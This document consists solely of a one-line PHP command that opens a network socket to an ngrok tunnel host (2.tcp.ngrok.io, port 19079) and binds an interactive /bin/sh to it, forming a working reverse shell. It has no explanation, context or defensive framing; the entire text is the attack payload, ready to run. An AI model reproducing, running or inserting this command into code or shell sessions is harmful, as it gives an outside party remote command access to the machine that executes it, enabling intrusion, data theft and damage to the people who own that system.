php -r '$sock=fsockopen("2.tcp.ngrok.io",19079);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'